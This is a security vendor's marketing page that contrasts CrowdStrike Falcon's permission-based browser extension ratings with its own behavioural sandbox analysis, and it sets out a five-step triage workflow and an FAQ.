CrowdStrike vs Am I Being Pwned
Triaging Browser Extensions with CrowdStrike Falcon
CrowdStrike Falcon inventories browser extensions and rates them by permission severity, but it can't read their code or give a verdict. Here's how to actually triage extensions with evidence.
Does CrowdStrike triage browser extensions?
Partly. CrowdStrike Falcon's Browser Extension Assessment, part of Falcon Exposure Management, inventories every extension across your fleet and rates each one Critical, High, Medium or Low. But that rating is heuristic permission-severity: it comes from the permissions an extension declares, plus context signals like whether it was sideloaded or is missing a Web Store listing. The code itself is never read.
So the rating tells you an extension could do something dangerous because it asked for a powerful permission, not that it actually does. CrowdStrike frames a high-severity extension as 'requiring further evaluation' - the allow-or-block call, and the work of proving whether the code is genuinely malicious, still lands on your analyst.
That's the gap a dedicated tool fills. Am I Being Pwned deobfuscates the source and detonates the extension in an instrumented sandbox, then reports what it did: the endpoints it called, the data it read, anything it tried to exfiltrate. You get a keep-or-block call backed by captured evidence, not a permission score someone still has to interpret.
What CrowdStrike gives you
- Agent-based inventory of every extension across Chrome, Edge, Safari and Firefox on Windows and macOS
- Per-extension detail: version, declared permissions, publisher, install method (including sideloaded), and Web Store listing status
- A heuristic 'permission severity' rating (Critical / High / Medium / Low) computed from requested permissions
- Context signals that flag suspicious installs, e.g. sideloaded plus missing vendor plus no store listing
- Policy enforcement: block installation and stop installed extensions from running, with allow and block lists
Where it stops
- The rating is computed from declared permissions; the extension's actual JavaScript is never analysed
- It never runs the extension, so nothing is observed at runtime
- A high rating means 'requiring further evaluation', not a verdict - the triage call still falls to your analyst
- Vulnerable code shipped inside an extension isn't correlated against known CVEs
- When an extension silently updates, its behaviour isn't re-checked; permissions rarely change even when behaviour does
CrowdStrike vs Am I Being Pwned
How to triage browser extensions when you use CrowdStrike
CrowdStrike gives you a scored inventory. Here's how to turn that into an actual keep-or-kill decision for each flagged extension.
- 1
Export the flagged extensions from Falcon
In Falcon Exposure Management, open Browser Extension Assessment and pull everything rated High or Critical, plus anything flagged as sideloaded or unlisted. That is your triage queue - CrowdStrike has told you where to look, not what to do.
- 2
Read the severity for what it is
The rating reflects the permissions an extension requested. A Critical extension has asked for powerful access; it has not been shown to abuse it. Treat the score as a prioritisation signal, not a verdict.
- 3
Get behaviour, not the manifest
For each queued extension you need to know what the code does: which endpoints it contacts, what data it reads, whether it injects scripts. Paste the extension ID into Am I Being Pwned for a behavioural report, or scan your whole Workspace at once.
- 4
Decide with evidence
Keep extensions whose behaviour matches their stated purpose; remove the ones caught exfiltrating data or injecting code. Each finding links to captured evidence and a CWE reference, so the decision is defensible to security, legal, and the extension's owner.
- 5
Enforce and keep watching
Push blocks through CrowdStrike or your MDM, then monitor for silent updates. An extension that was clean at install can turn malicious in a later version - permission-based scores miss that, continuous behavioural re-scanning catches it.
From our published research
“Their median risk score for CRITICAL extensions (46) is actually lower than for CLEAN ones (49). The scores showed no meaningful correlation with actual risk across our sample of 2,534 extensions.”
Spin AI vs Am I Being Pwned
What happens when you score by permissions alone.
“They build a payload, then put it through URL encoding, double base64, JSON stringify and base64 again, a columnar transposition cipher, AES-256-CBC with a symmetric key hardcoded in the extension source, then base64 one final time.”
Stylish Is Back, Back Again
2M users. A permission score would never have caught it.
“Permissions describe what an extension is allowed to do. They say nothing about what it does.”
Why Permission Scoring Fails
The thesis behind behavioural extension analysis.
Frequently asked questions
Does CrowdStrike Falcon detect malicious browser extensions?
It flags extensions that request dangerous permissions or install suspiciously (sideloaded, unlisted) and rates them by permission severity. It does not analyse the extension's code or run it, so it cannot confirm an extension is actually malicious - it surfaces candidates 'requiring further evaluation'. Confirming malicious behaviour needs code and runtime analysis, which is what Am I Being Pwned provides.
What is CrowdStrike's Browser Extension Assessment?
A component of Falcon Exposure Management that inventories browser extensions across your fleet and assigns each a heuristic permission-severity rating (Critical, High, Medium, Low) with context signals like install method and Web Store listing status. It also supports blocking extension installation and execution through policy.
Can CrowdStrike tell me if an extension is safe to keep?
No. CrowdStrike gives a permission-derived risk severity and explicitly frames high-risk extensions as 'requiring further evaluation'. It hands the allow-or-block decision to your team without telling you what the code actually does. A keep-or-remove verdict requires behavioural evidence.
Do I still need a dedicated tool if I already have CrowdStrike?
CrowdStrike is strong at inventory and at enforcing block policies. Where it stops is analysis: it scores permissions, not behaviour. Am I Being Pwned complements it by reading the code, running the extension in a sandbox, and returning an evidence-backed verdict, so you know which of CrowdStrike's flagged extensions are genuinely dangerous.
How is permission-based scoring different from behavioural analysis?
Permission scoring rates what an extension is allowed to do based on the access it declares. Behavioural analysis observes what it actually does when it runs. An extension can request modest permissions and still ship malicious code, or request broad permissions and behave perfectly. Our research found permission-based scores had no meaningful correlation with real risk across 2,534 extensions.
Triage every extension in your fleet, with evidence.
Free scan of your Google Workspace in under 48 hours.